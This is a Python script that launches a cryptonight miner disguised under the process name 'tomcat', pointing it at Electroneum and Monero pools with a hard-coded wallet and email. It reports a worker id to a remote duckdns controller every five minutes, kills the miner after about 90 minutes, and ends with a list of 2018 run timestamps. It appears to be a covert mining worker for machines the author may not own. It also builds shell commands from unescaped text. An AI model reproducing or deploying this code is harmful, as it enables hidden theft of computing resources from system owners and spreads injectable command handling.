import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:05:05.958370
#2018-02-17 16:51:04.789943
#2018-02-17 18:39:07.573910
#2018-02-17 20:27:05.330861
#2018-02-17 22:15:01.605763
#2018-02-17 23:59:04.645011
#2018-02-18 01:50:03.458391
#2018-02-18 03:37:07.409365
#2018-02-18 05:25:06.171367
#2018-02-18 07:17:04.259076
#2018-02-18 09:04:01.257475
#2018-02-18 10:51:03.983182
#2018-02-18 12:37:04.092491
#2018-02-18 14:23:01.926734
#2018-02-18 16:14:01.958525
#2018-02-18 18:02:01.342836
#2018-02-18 19:49:03.936902
#2018-02-18 21:36:02.169615
#2018-02-18 23:23:06.452400
#2018-02-19 01:11:04.959611
#2018-02-19 02:57:01.277716
#2018-02-19 04:44:05.269439
#2018-02-19 06:28:06.391744
#2018-02-19 08:18:03.860238
#2018-02-19 10:07:05.268364
#2018-02-19 11:56:07.476849
#2018-02-19 13:43:06.835816
#2018-02-19 15:31:04.395234
#2018-02-19 17:19:05.182090
#2018-02-19 19:08:04.785744
#2018-02-19 20:56:06.539523
#2018-02-19 22:44:07.786784
#2018-02-20 00:28:05.969720
#2018-02-20 02:16:08.201717
#2018-02-20 04:08:07.028494
#2018-02-20 05:52:06.985279
#2018-02-20 07:39:08.247004
#2018-02-20 09:24:07.655179
#2018-02-20 11:08:03.875961
#2018-02-20 12:56:04.905659
#2018-02-20 14:42:07.777670
#2018-02-20 16:32:08.942612
#2018-02-20 18:20:07.243419
#2018-02-20 20:11:07.330585
#2018-02-20 21:57:03.868051
#2018-02-20 23:38:04.249994
#2018-02-21 01:22:05.916109
#2018-02-21 03:12:04.026627
#2018-02-21 05:02:05.396259
#2018-02-21 06:49:06.104210
#2018-02-21 08:36:06.041405
#2018-02-21 10:22:07.920725
#2018-02-21 12:09:09.585838
#2018-02-21 13:59:02.021408
#2018-02-21 15:44:07.809247
#2018-02-21 17:37:08.128734
#2018-02-21 19:23:06.432884
#2018-02-21 21:13:04.107769
#2018-02-21 22:59:08.798267
#2018-02-22 00:46:06.854914
#2018-02-22 02:34:07.900884
#2018-02-22 04:20:03.866109
#2018-02-22 06:05:10.150122
#2018-02-22 07:51:06.430963
#2018-02-22 09:40:07.652037
#2018-02-22 11:27:01.843542
#2018-02-22 13:14:09.798808
#2018-02-22 15:04:08.281081
#2018-02-22 16:48:07.536175
#2018-02-22 18:36:07.144904
#2018-02-22 20:28:05.576063
#2018-02-22 22:16:07.582386
#2018-02-23 00:03:04.660549
#2018-02-23 01:51:05.192208
#2018-02-23 03:39:04.393485
#2018-02-23 05:24:01.981535
#2018-02-23 07:09:03.522738
#2018-02-23 08:59:01.255004
#2018-02-23 11:18:09.412236
#2018-02-23 13:11:05.803886
#2018-02-23 14:56:09.012872
#2018-02-23 16:45:10.587100
#2018-02-23 18:34:01.520010
#2018-02-23 20:22:07.017176
#2018-02-23 22:11:01.999948
#2018-02-23 23:58:03.797581
#2018-02-24 01:47:01.446763
#2018-02-24 03:38:07.227566
#2018-02-24 05:22:04.814834
#2018-02-24 07:10:06.468685
#2018-02-24 08:58:05.173982
#2018-02-24 10:38:04.931850
#2018-02-24 12:24:05.566313
#2018-02-24 14:18:05.296393
#2018-02-24 16:04:06.471878
#2018-02-24 17:56:05.332674
#2018-02-24 19:43:05.231117
#2018-02-24 21:29:06.571988
#2018-02-25 00:14:03.425333
#2018-02-25 03:26:03.666683
#2018-02-25 07:21:05.458635